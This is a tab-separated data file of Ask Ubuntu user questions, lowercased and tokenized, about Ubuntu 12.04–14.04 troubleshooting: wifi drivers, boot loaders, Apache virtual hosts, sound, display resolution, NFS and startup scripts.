501216	internet connection problem - broadcom + lenovo ideapad + ubuntu 14.04	i 'm new to linux/ubuntu , and i 'd like some help with setting up wifi with it . i have a broadcom wireless router ( broadcom corporation bcm4312 ) . this is the config : eth0 link encap : ethernet hwaddr 00:26:9e : e4:4e : a1 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:153 errors:0 dropped:0 overruns:0 frame:0 tx packets:153 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:10927 ( 10.9 kb ) tx bytes:10927 ( 10.9 kb ) and these are my connections : *-network description : network controller product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:17 memory : f2000000-f2003fff *-network description : ethernet interface product : netlink bcm57780 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth0 version : 01 serial : 00:26:9e : e4:4e : a1 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.134 duplex=half firmware=sb v2.05 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:49 memory : f4500000-f450ffff i spent the last few days reading and copying codes from here and ubuntuforums but nothing changed .
501217	why does my laptop grayscreen after i reopen it ?	i 'm using an intel macbook on ubuntu 12.04 with kernel version 3.11.0-26-generic the problem i 've been having is that , when i close the laptop lid and reopen it the machine does not resume correctly -- it works correctly until after the login screen , then just shows a gray screen . i know it 's not frozen , as i can use my keys to manipulate audio and brightness settings , the screen just doesnt display anything . i 've seen other topics on this , but they all have wildly different solutions and none have accepted answers . just some questions on potential solutions from myself : would having a swap partition fix this ? ( i havent made one yet , not sure where to position it ) is this some sort of kernel issue ? i 've seen varying opinions , would upgrading to the 3.15 kernel fix this ? ps my update manager says that the next available version of ubuntu is 12.10 , so i 'm not sure how to go about upgrading to 14.04 , can anyone help with this as well ? i didnt think it deserved its own topic
501220	grub bootloader is not loading at startup	please help . right now i 'm using windows 7 but i want to switch to linux . so first i tried to install zorin os . i successfully installed it by following steps : made live usb , install on free deleted partition ( ext4 ) which is of 45 gb , it got installed successfully , then i restart my pc as per the command . after restarting the grub bootloader menu does not appeared and regular windows got loaded . then i tried to install another os , elementary os luna , but the same thing happened again . please help me out . thank you in advance .
501222	problem to configure virtualhost ubuntu 14.04	i 'm facing some troubles to configure virtualhosts in ubuntu 14.04 . when i try to access the virtualhost domain on the browser it leads to the www folder . here is my virtualhost file in /etc/apache2/sites-enable/test : < virtualhost *:80 > servername test.local.area serveralias teste.local.area documentroot /var/www/git_pro/test directoryindex index.php index.phtlm index.html index.htm index.shtml < /virtualhost > here is the default site : file : 000-default.conf < virtualhost *:80 > serveradmin webmaster @ localhost servername localhost documentroot /var/www < directory / > options followsymlinks allowoverride all < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride all options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost > and here is the hosts file : 127.0.0.1 localhost 127.0.1.1 bruno-pc 127.0.1.2 test.local.area # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters someone to help me out here ? thanks .
501225	ubuntu 14.04 - citrix 12.1 run xenapp in windowed mode	good evening all , is there a way i can force the citrix client through xenapp to run in windowed mode ? i have tried using the wfcmgr but it does n't save my settings . many thanks in advance , josăš
501228	ubuntu sdk : provide your application identifier in $ app_id environment variable	i 'm getting familiar with ubuntu sdk and qml . after creating sample project : 'app with simple ui ' , i 'm able to run it correctly . but , i 'm getting warning : unity : :action : :actionmanager : :actionmanager ( qobject* ) : could not determine application identifier . hud will not work properly . provide your application identifier in $ app_id environment variable . ** ( qmlscene:16973 ) : warning ** : unable to register app : gdbus.error : org.freedesktop.dbus.error.invalidargs : invalid application id how to provide such id per application ? should i put it somewhere in code ? thanks .
501230	no radiotray app indicator	i 've been using this app for years . i reinstalled lubuntu 14.04 on a machine then : apt-get install radiotray executed it from the applications menu . i see it running in task manager but there is no app indicator or controller in the system tray .
501231	non-default resolutions should work but do n't	i just installed ubuntu 14.04 on my computer with an integrated intel速 ivybridge desktop graphics chip , and immediately noticed the resolution was wrong . when i went to change my resolution , there were the options 1280x720 and 1920x1080 ( among others ) , but no 1600x900 , which i use on my windows partition . i know this is a common thing , so i looked it up and eventually started firing out commands : zangent @ zac-ubuntu-comp : ~ $ cvt 1600 900 60 # 1600x900 59.95 hz ( cvt 1.44m9 ) hsync : 55.99 khz ; pclk : 118.25 mhz modeline `` 1600x900_60.00 '' 118.25 1600 1696 1856 2112 900 903 908 934 -hsync +vsync zangent @ zac-ubuntu-comp : ~ $ xrandr -- newmode `` 1600x900_60.00 '' 118.25 1600 1696 1856 2112 900 903 908 934 -hsync +vsync zangent @ zac-ubuntu-comp : ~ $ xrandr -- addmode hdmi1 `` 1600x900_60.00 '' zangent @ zac-ubuntu-comp : ~ $ now , 1600x900 shows up in the resolution list for my tv , but when i set it to that , i just get a black screen until it resets . is there any way to fix it , or do i have to live with garbled text on 1080p ?
501232	send files using wifi direct	i need to send some files from my android phone to my laptop using wifi direct , however my computer is not showing up on my mobile even wifi is turned on both pc and my phone . how can i send files via wifi direct from my mobile to my computer running xubuntu 14.04 ?
501233	ca n't boot to live cd - samsung np355e5c-a01us	i am trying to upgrade my laptop , a samsung np355e5c-a01us , from ubuntu 12.10 to 14.04 . the previous installation ( ubuntu 12.10 ) has become a bit unstable making this very difficult . i have a live cd with the new os loaded onto it and when i run the disk with it tells me to reboot from the cd . when i reboot i do n't see any options to boot to the live cd . any help would be greatly appreciated !
501234	how to go back to unity ?	tried out xubuntu via : sudo apt-get install xubuntu-desktop how do i go back to unity and delete everything xubuntu related ? thanks .
501235	is there a way to statically map mac addresses to ip addresses for machines in maas ?	i have few ( 11 ) servers in maas that will be used for openstack deployment . i want to give specific ip addresses to specific nodes in the maas . is there a way to map the mac address to ip address so that servers do n't get random ip from the dhcp pool . i am using the maas server as the dhcp server .
501237	after clean install of ubuntu 14.04 : `` reboot and select proper boot device '' . how do i fix this if boot-repair did not work ?	i tried running boot-repair as referenced by the following question , but after restarting , i still see the same `` reboot and select proper boot device '' error . does anyone know another viable solution ? i would prefer not to wipe the system again if possible because i thought boot-repair had fixed the problem and spent a lot of time setting up things . fyi , my machine is a new acer aspire . also , from the live install usb , i executed `` check disk for errors '' , which reported that there was one error , but did n't say what the error was . additionally , at least one co-worker with an identical system has the same problem . update : i tried to boot off of a coworker 's uefi live usb , and this did n't work . i also noticed in the bios setup utility that the hard drive is listed as `` [ uefi : st1000dm003-1 ... ] '' . is this the issue ? if so , how do i fix this ? here is a link to ththe boot-repair output : http : //paste.ubuntu.com/7832746/
501240	wine 1.7 , ubuntu 14.04 , world of warcraft	i have installed wine 1.7 . when i launch battle.net launcher , wow launcher or wow.exe , it always says '' data//wow-update-base-17325.mpq : world of warcraft canât make a required change to an archive file . be sure you have write permission for the world of warcraft folder or try running the game in administrator mode . for more information , see : https : //battle.net/support/article/6910 '' what can i do ?
501244	trusty preseed error	i have a preseed file that installs trusty but the install is giving me this error : jul 22 17:52:42 in-target : setting up sysv-rc ( 2.88dsf-41+deb7u1 ) ... jul 22 17:52:42 in-target : info : reordering boot system , log to /var/lib/insserv/run-20140722t1052.log jul 22 17:52:42 in-target : error : something failed while migrating . jul 22 17:52:42 in-target : jul 22 17:52:42 in-target : error : unable to migrate to dependency based boot sequencing . jul 22 17:52:42 in-target : jul 22 17:52:42 in-target : see http : //wiki.debian.org/lsbinitscripts/dependencybasedboot for jul 22 17:52:42 in-target : more information about dependency based boot sequencing . to jul 22 17:52:42 in-target : reattempt the migration process run 'dpkg -- configure sysv-rc ' . jul 22 17:52:42 in-target : jul 22 17:52:42 in-target : dpkg : error processing package sysv-rc ( -- configure ) : jul 22 17:52:42 in-target : subprocess installed post-installation script returned error exit status 1 jul 22 17:52:42 in-target : errors were encountered while processing : jul 22 17:52:42 in-target : sysv-rc jul 22 17:52:42 in-target : e jul 22 17:52:42 in-target : : jul 22 17:52:42 in-target : sub-process /usr/bin/dpkg returned an error code ( 1 ) jul 22 17:52:42 in-target : jul 22 17:52:42 in-target : setting up sysv-rc ( 2.88dsf-41+deb7u1 ) ... jul 22 17:52:42 main-menu [ 219 ] : warning ** : configuring 'pkgsel ' failed with error code 100 jul 22 17:52:42 main-menu [ 219 ] : warning ** : menu item 'pkgsel ' failed . jul 22 17:52:56 main-menu [ 219 ] : info : modifying debconf priority limit from 'high ' to 'medium' jul 22 17:52:56 debconf : setting debconf/priority to medium jul 22 17:52:59 main-menu [ 219 ] : info : menu item 'save-logs ' selected seems to me that 'something failed ' is very vague . does anyone have any idea what could have happened ? i tried going into a shell and doing the dpkg -- configure sysv-rc but dpkg is n't installed at that point i guess . any help would be much appreciated !
501248	tried to install audio driver for asus p5k , now sound is not working	i was bored recently so i decided to download and install drivers from asus site . my motherboard is asus p5k . after downloading the drivers , i messed up the installation somehow ( do n't remember the details ) and now i do n't have sound at all ! i 'm new to ubuntu and i do n't have a clue how driver setup works . can you tell me how to bring back the old drivers or how to install this driver ? and the first driver worked perfectly , but i was curious about the new driver so i messed up : ( p.s , ubuntu 14.4
501254	ubuntu 14.04 - how to fix the ubuntu appearance	i have played with xfce and kde and after uninstalling them i was left with some problems with my default ubuntu desktop . i have attached some photos here to show you what i mean . i would like to reset ubuntu desktop so that everything looks as it should again . thanks !
501267	copy drivers from one ubuntu to another ubuntu	is there any way so that drivers installed in one ubuntu device be installed in another device . some type of transfer of drivers
501268	can i use ubuntu or should i use a lower version like xubuntu ?	i used to use ubuntu hardy on my old laptop . but have n't used it since then . my desktop is really old . it is dell with intel ( r ) pentium ( r ) d cpu 2.66 ghz with 1.00gb ram , 140gb hard-drive . since microsoft is n't supporting windows xp anymore , which ubuntu version can i use with these computer specs . also , i need to be able to use some type of media library that is friendly with a ipod so i can sync my mom 's playlists and so on .
501269	no signal on monitor	i 'm getting a `` no signal '' on monitor . the system was still running when the monitor crashed with this error message . checked cables and all are hooked up .
501274	running dropbox at startup	please excuse a simple question from a new linux user . running ubuntu 12.04 on a dell pentium ( r ) dual-core cpu e5800 @ 3.20ghz ă 2 . i installed dropbox ok with the command : cd ~ & & wget -o - `` https : //www.dropbox.com/download ? plat=lnx.x86 '' | tar xzf - as suggested by the dropbox web site , which worked fine . then the dropbox daemon was run with the command : ~/.dropbox-dist/dropboxd again this worked well , dropbox runs in the background giving easy access to my cloud data . the problem how can i automatically run the dropbox daemon when the session is restarted ? current workaround is to open a terminal and enter the command : ~/.dropbox-dist/dropboxd many thanks
501275	gnu screen glitchy	i am trying to read accelerometer sensor values via screen /dev/ and it seems to work at times but it almost always becomes glitchy . this is what a normal output should look like : here but this is what i get most of the time : here and a lot of the time it freezes . i tried this on a desktop running ubuntu and it worked fine . additionally , i used a friend 's macbook pro to test this and it was also okay . i have tried sudo screen /dev/ttyacm0 9600 as well as sudo screen /dev/ttyacm0 and both have similar results . there are probably multiple possible causes for this issue but if anyone knows a way i could find the cause/area to narrow down it would be much appreciated . edit i am dual booting ubuntu and windows 7 on two different drives and i just tested the same device using a terminal program in windows and there seems to be no problem . thanks
501276	how to set dns exclusively for a network namespace	i 've created a network namespace . i thought there was a resolv.conf file for each namespaces created but it 's not the case on my system ( ubuntu 14.04 ) . i do n't have the following path /etc/netns/namespace_name/resolv.conf.. the folder netns does n't exist . there is only one resolv.conf ( /etc/resolv.conf and another one mirrored in /run/resolv.conf ) . any changes in this file affect all network interfaces . is there a way i can use different dns for both the host and the namespace ? thanks !
501277	can not play dvds on ubuntu 14.04	i 've got libdvdcss2 installed but still no joy . tried vlc , mplayer and the default players and all give me errors . rgionset does not even see the dvd . vlc ~ $ vlc /dev/sr0 vlc media player 2.1.4 rincewind ( revision 2.1.4-0-g2a072be ) [ 0x862118 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . libdvdnav : using dvdnav version 4.2.1 libdvdnav : dvd title : nausicaa libdvdnav : dvd serial number : 43053257___mvb__ libdvdnav : dvd title ( alternative ) : libdvdnav : unable to find map file '/home/alex/.dvdnav/nausicaa.map' libdvdnav : dvd disk reports itself with region mask 0x00fd0000 . regions : 2 libdvdread : attempting to retrieve all css keys libdvdread : this can take a long time , please be patient libdvdread : get key for /video_ts/video_ts.vob at 0x00000153 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_01_0.vob at 0x000001ba libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_01_1.vob at 0x0000c924 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_02_0.vob at 0x0000d2a0 libdvdread : elapsed time 1 libdvdread : get key for /video_ts/vts_02_1.vob at 0x0000d2ed libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_03_0.vob at 0x0000eea8 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_03_1.vob at 0x0000eef5 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_04_0.vob at 0x0000fb30 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_04_1.vob at 0x0000fb7d libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_05_0.vob at 0x00017aba libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_05_1.vob at 0x00017b07 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_06_0.vob at 0x0035ebfb libdvdread : elapsed time 1 libdvdread : get key for /video_ts/vts_06_1.vob at 0x0035ec48 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_07_0.vob at 0x0037dd38 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_07_1.vob at 0x0037dd85 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_08_0.vob at 0x003df255 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_08_1.vob at 0x003df2a2 libdvdread : elapsed time 0 libdvdread : found 8 vts's libdvdread : elapsed time 2 [ 0x7f8c140009b8 ] main input error : es_out_reset_pcr called [ 0x7f8c140009b8 ] main input error : es_out_reset_pcr called [ 0x7f8c140009b8 ] main input error : es_out_reset_pcr called [ 0x7f8c140009b8 ] main input error : es_out_reset_pcr called
501280	getting disconnections on wifi	i 'm running 14.04lts and this is the first time using a wireless card on my computer . in my previous residence , i was able to have my computer connected via ethernet . however now that i have moved , this is not possible and did n't think it would be a huge issue . i 'm using an alfa awus036nh wireless card to connect to the router in the living room . the router is on the other end of the house , but i have no problem connecting and have a decent signal . i try to keep a connection to my vpn almost 100 % of the time , but i 've seen it disconnect multiple times . it appears to be doing it at random . i 've seen it work perfectly for over an hour , and then i 've also seen it disconnect in less than 10 minutes . it would n't be a big deal because it seems like it stays connected to the router , but drops the vpn connection , because it then instantly says `` connected to wireless network '' . i have seen it briefly disconnect me when not even using the vpn service , so i 'm guessing this is something related to software , or my wireless card ?
501281	installing ubuntu , i need a walkthrough for me and my hp windows 8.1 laptop	okay , so i followed some tutorials , but i could not get it to work still ... ... i just need a walkthrough or something for me and my hp windows 8.1 laptop .
501283	append options to grub_cmdline_linux_default without modification on files	i want to add an option to grub_cmdline_linux_default without modifying any files on the system . the reason is that i want to apply it by installing a driver package , but currently i have n't found any way to do that without touching /etc/default/grub or /etc/grub/10_linux . i tried to add it with the script below which should be executed before 10_linux but it has no effect : $ cat /etc/grub.d/09_linux_vmalloc # ! /bin/sh set -e export grub_cmdline_linux_default= '' $ grub_cmdline_linux_default vmalloc=256mb ''
501291	how to restore firefox download progress bar in unity launcher ?	firefox used to be better integrated with unity : when downloading it would show the number of files and a progress bar . this was achieved through the unityfox add-on , but it no longer works and the development seems to have ceased . is there any way to achieve this in a current version of firefox ( say , version 31 in ubuntu 14.04 ) ? even the newest version of thunderbird seems to work just fine , displaying the number of unread emails in the launcher , so i imagine there 's some way for that functionality to be added back into firefox .
501296	sound issue on ubuntu 14.04 dual boot	i have a dual boot of ubuntu 14.04 with windows 7 . recently after starting windows to play a game ubuntu would no play any sounds . looking in the sound settings there are no input or output devices despite several plugged in . restarting the computer into ubuntu several times fixes the problem sometimes . i 've tried running sudo alsa force-reload but it does n't fix the issue . i 've also tried reinstalling alsa-utils . i suspect the problem comes from my dual boot as the problem only occurs when i boot into ubuntu after booting from windows 7 . could be a hardware issue , i my mobo is an asus f2-a85-v pro if that helps .
501300	can i enable hibernation mode in my case ?	i was reading this question on how to enable hibernation because i 'm interested in sending the computer to hibernate instead of power off when power is low . after trying sudo pm-hibernate , the screen shows the following erros ( shown in the picture below ) before hibernating , but it does hibernate . after powering on again , it just shows the grub2 normally ( with the dual boot of w8.1 and ubuntu 14.04 ) . after selecting ubuntu , it shows two more erros before returning to the expected state : programs and everything else as it should be if no erros happened ( at least i have n't noticed anything at all . have n't tried bluetooth and some other specific stuff ) . those two errors lasts less than a second and are hard to register from my cell camera . if someone would like to see them , i can try recording a video and checking myself after trying to pause at the exact moment . my system is ubuntu 14.04 64bits running practically perfect on a non certified laptop : inspiron 7520 ( or 15r se ) ( all settings to the max available ) . if you require more information , ask me so i can provide ! edit : also found this . people had same errors , but they did not accomplish the hibernate state , while mine did . edit2 : when running lspci i got this : 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm77 express chipset lpc controller ( rev 04 ) 00:1f.2 raid bus controller : intel corporation 82801 mobile sata controller [ raid mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] chelsea lp [ radeon hd 7730m ] ( rev ff ) 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 07 ) 08:00.0 network controller : qualcomm atheros ar9485 wireless network adapter ( rev 01 ) so this means the error is in the ethernet driver ? but internet works fine afterwards . maybe it bugs if i 'm in cable and not wifi ?
501302	is there a log for connected peripherals ?	i need a log of all devices i connected to my ubuntu - even if they are n't connected anymore . so a log of all connected peripherals in ubuntus lifetime would be perfect . does that exist ?
501303	why does my laptop overheat on 14.04 ?	i have read similar posts here but could not find an answer that solves my problem . so here is what happens : as soon as i open one app in ubuntu 14.04 my laptop overheats making noise . laptop specs are : intel corei5-3210m cpu @ 2.50ghz 2.50 ghz , ram 4gb , nvidia geforce gt 630m 1gb . i am aware of the project called bumblebee , i have installed it ( using the cmd : sudo apt-get install bumblebee bumblebee-nvidia primus linux-headers-generic ) but nothing changes . i am also aware of nvidia-prime , installed it but still nothing changed . can you suggest a possible solution ? what am i doing wrong ?
501304	can i run ubuntu/kubuntu on a blade server with no graphics card ?	on ebay there are some $ 100 hp and dell blade server units that i 've seen in action in data center tours . my question is , would a single one with 32gb ram , 4 intel xeon 3ghz processors and no graphics card be able to run ubuntu ? and would ubuntu be able to actually use the entire system ? i wo n't be using it for `` big data '' per se , but i am thinking of compiling my own custom android builds and building/compiling my own custom build of ubuntu ( kind of just for the fun of it , maybe a little for the fact that i 'll be able to show off computer prowess ) . also , i want to know if a full desktop environment would even run right due to the lack of a graphics card . i might be able to get a graphics card , but if i can avoid it i will at all costs ( except for if it exceeds the price of a card ) .
501305	what is the default root password and how to setup pppoe	the installation did n't ask me to set root password , but many occasions asked me for it . so what 's the default root password ? i wish to connect to network via pppoe . how do i set it up ?
501308	how can i find and run an application that 's already installed ?	i see that apturl is installed on my computer , but i ca n't seem to locate it . can anybody tell me how i can find an installed application on this computer ? i am getting very frustrated .
501314	screen shuts off and does n't respond	this happens on 12.04 64 bit and 14.04 32 bit . this does not occur with the same hardware on win7 64 bit . monitor is also okay . hardware is as follows : mb : asus rog maximus formula ram : 4gb cpu : intel core 2â˘ duo @ 3.6 ghz gfx : nvidia geforce 9500 gt 1gb running latest drivers for ubuntu . if watching a youtube video or listening to music , the sound will go on a repetitive loop , not stopping for 5+ minutes , which then the auto sleep kicks in and shuts in off , i think . any help is appreciated .
501316	why does firefox home icon not go to my home page in 14.04 ?	with 14.04 , in firefox after pressing the home icon i get the ubuntu page in the current tab and my home page in a new tab . with 13.10 , pressing the home icon took me directly to my home page . is this a deliberate change , or a bug ?
501319	upgraded server from 12.04 to 14.04 - server now rejects all connections except ping and ftp	i remotely upgraded my server from 12.04 to 14.04 . after rebooting it , it responds to pings and i can ftp to it , but everything else gets rejected . does anyone have any ideas as to what 's happened ? i can show what that state of the filesystem is over ftp .
501323	why does the login screen in 14.04 only change when i set a picture background , but not when i use a solid color ?	when i set a solid color as desktop background ( like black ) , which i like far better , then the login screen shows the default purplish picture ( warty-final-ubuntu.png ) . how to i make it also show a simple black screen ? btw , i educated myself about lightdm settings and access rights to pictures in /usr/share/backgrounds , so i specifically ask for an answer that does not involve any picture files , since i want a simple , single color , no gradient . in response to first comment , i think i still need more specific knowledge about lightdm . first of all , im using ubuntu 14.04 and the configuration files i am looking at are in this directory : /usr/share/lightdm/lightdm.conf.d/ is it supposed to work in a way that all these files are always read , when lightdm starts ( maybe in lexical order ) ? is there something else i would have to look at ? i specifically tried setting this : background= ' # 000000' but it had no effect whatsoever ( still showing warty-final-ubuntu.png ) , that 's why i came here . edit : @ kenn actually , in my case that file does not exist . thomas @ thomas-laptop : ~ $ ls /etc/lightdm/ users.conf
501325	unable to print to my canon imageclass mf4700 in ubunti 14.04 lts	i am just a user of the ubuntu ... so my knowledge of ubuntu is very basic . i just acquired a new canon imageclass mf4700 all-in-one printer . i researched on the web and found a link to download this file ... linux_ufrii_printerdriver_v290_uk_en.tar.gz i installed the 64bit version ... but my ubuntu did not recognize the driver . then i went to the canon usa site and downloaded ... linux_ufrii_printerdriver_v290_us_en.tar.gz i tried to install this us version ... but the message was ... driver already installed . i then went to the printer page in system settings and deleted the old 4600 printer icon . i re-ran the install using the usa version ... i did not get the driver already installed message this time . upon finishing the driver install , i tried to print a test page . the top of my ubuntu page immediately showed a printer icon . then it disappeared after about 5 seconds and on the property page ... the printer state changed to `` idle - sending data to printer '' . there was no output . 2 questions : 1. do i need to properly un-install the uk version before installing the us version ? 2. will this us version also work for faxing and scanning ? appreciate anyone 's help . thanks george
501328	why do i need to burn ubuntu onto a cd/dvd ?	i 've decided to redo the whole process of downloading ubuntu . i noticed that last time i failed to see that i was supposed to burn the disc image ... but , now , since i do n't have an empty disc ... at least not that i know of , i ca n't burn the disc ... so , if burning the disc is unnecessary , i 'd like to know . also , what does it do ? please explainit to me in a simple manner , i 'm a 13 year old graphic designer ... not a computer pro ... thanks ! -joey
501329	nfs export not accessible	here 's my /etc/mtab file on the server ( the important parts ) : /dev/sda1 / ext4 rw , errors=remount-ro 0 0 /dev/sda5 /home ext4 rw 0 0 /dev/sdb1 /data ext3 rw 0 0 /dev/sdc /data/video ext3 rw 0 0 here 's my /etc/exports : /data 192.168.2.0/24 ( rw , insecure , all_squash , anonuid=1000 , anongid=100 ) the problem is : within /data is a music and books folder , as well as video.. when i mount the nfs drive on any other machine , i can see the contents of /data/books and /data/music but /data/video is empty . i ca n't seem to figure out why . thanks .
501330	how do i change default folder names in home directory ?	how to change default folder names in home directory ? my system ( ubuntu 14.04 ) was translated to polish , and i changed to english , but left the names of default folders in polish when asked . now i want to change them to english , how to do that ?
501331	how do i disable the headphone jack so sound will come out of the speakers ?	i just installed ubuntu 12.04 ( it still has windows 7 on it but i ca n't access it i do n't think ) on my moms older and pretty beat up laptop . the thing has a few problems like needing the keyboard replaced because our bird picked off the arrow keys and a couple others they do n't work anymore ( which is why i do n't think i can access the windows 7 , but i 'm ordering another keyboard ) and the headphone jack is broken . it was dropped while headphones were plugged in and now it thinks theres head phones in all the time , even though if i plug some in it doesnt work because its broken inside . so can i disable the headphone jack ? i tried looking up how to do it but i 'm not getting anywhere . so ... what can i do ? i also though i could just buy some usb speakers and plug those in and maybe that would work as a temporary thing ? i dunno . i just need to do something about it .
501332	overheating issue after installing 14.04	i 'm new to the ubuntu and linux thing . i recently downloaded and booted up ubuntu . i made the switch from windows vista to ubuntu , and i really like it . unfortunately , i started getting an overheating issue . my laptop ( hp probook 4510s with 1gb ram celeron processor ) overheats until it shuts down . i wo n't even be using it , but as long as it 's on it gets hot . i cleaned the fan out , but it 's still overheating . could you guys point me in the right direction to diagnose and correct the problem ? i 'm pretty new to the os , so i may not know a lot of the things or where to actually look . any help is appreciated !
501333	installing pkgs via muon on raring 13.04	on a new partition with kubuntu 13.04 when i try to install any new pkgs ( i tried wine , qtoctave ) i get a unable to access from here are a few examples http : //extras.ubuntu.com/ubuntu/dists/raring/main/source/sources 404 not found etc ... have these pkgs moved elsewhere ? previously i had wine 1.4 installed properly and operational with muon i can not complete the update any hints would be welcome thanks gio
501337	window manager wo n't start after upgrade to trusty	i recently upgraded my desktop from 13.04 to 14.04 . i see the normal graphical login screen , and i 'm able to enter my username and password . however , after entering my login information , nothing seems to happen . the login screen disappears , showing just my desktop background . i still have a cursor , but right-clicking and left-clicking do n't do anything . switching to a virtual terminal and killing x gets me back to to the login screen . i 've tried every window manager option listed , and all give the exact same results . how can i debug or fix this issue ?
501339	run root script or command as root in startup application in ubuntu 14.04	i have a wireless adapter that used to work in ubuntu 13.10 ( dwa 171 ) after installing drivers for it . now it wo n't work the same way anymore since i upgraded to ubuntu 14.04 . i 've found the only way to make it work properly is to run the command sudo service network-manager restart i already tried putting this command in rc.local , rc2.local and rc3.local with no real luck . i want this command to run automatically right after login in with startup application program . please tell me how to .
501340	need help recovering data from hard disk formatted by ubuntu,	i am a beginner with ubuntu . i have tried installing ubuntu yesterday in c drive . however it took over the complete hard disk space . i dont see my data . after doing lot of research on internet got to know that with the help of disktest tool that can be recovered . i tried booting from live usb and installing testdisk on the that . i was successful in analysing the cylinders . got to see all the ntfs derives . but once i selected one of the drive and pressed enter it did not give me any option to recover it on external disk . please help .
501341	where are the build and src locations for qtcreator ?	in the qtcreator plugin creation wizard , this http : //doc.qt.digia.com/qtcreator-extending/images/firstplugin-pluginsetup.png window asks for qt creator sources , and qt creator build . i installed the ubuntu sdk from the repos , and am perplexed where to find these folders . the wizard will not let me move on until i find them . tutorial : http : //doc.qt.digia.com/qtcreator-extending/first-plugin.html
501342	var/www wo n't work	i 've installed the lamp stack on my ubuntu 14.04 laptop using the command : sudo apt-get install apache2 i went to localhost and it shows the typical tree ( index of ... http : //i.stack.imgur.com/dpc8a.png in my case the tree is empty ) . so i type at the command line sudo service apache2 start after that i create a hello world php file , called example.php and then i put that file inside var/www folder ( to getto that folder i go to files and then to system , and then to var folder , and then to www folder ) . and finally i open my browser and type localhost/example.php the file appears as not found . note : from the console i 've done this also : sudo chmod -r 755 var/www i 've also checked www folder perms and anybody has access files and i have `` create and delete files '' permission . what should i do ? the files are there but localhost show an empty list and any file is `` not found '' when i try to acess it from the browser .
501346	black screen after reboot on fresh install of ubuntu 14.04	i just installed ubuntu 14.04 to try linux . i am not familiar with linux structure or command line use . system : gigabyte 8i915p intel 3g cpu 2g ram . seemed to install ok but on reboot ubuntu screen flashed purple and then black screen . it seems as if there is something there but not visible . i used the i386 version for install .
501347	ethernet connection blocks some traffic while wifi works flawlessly	i 'm not sure whether it 's related , but i recently tried to reroute inbound traffic from a user-accessible port to port 80 following these instructions : http : //serverfault.com/a/112798 now , i ca n't establish a connection to my htpc ( whether it is ssh or transmission 's remote client ) , it times out . other machines can connect , so it 's not a problem on the htpc . if i try to connect to ssh on a random port , i get the `` connexion refused '' error , so i can reach the htpc ... when trying transmission 's port with ssh , i also get an error ( instead of a timeout ) . it seems only successful connections times out . in addition , i can connect to remote servers from the problematic machine . when i unplug the ethernet cable and only use the wifi , everything works as it should . the problematic machine is a fresh install of ubuntu 14.04 , and the htpc is a fresh install of xbmcbuntu with ssh server enabled .
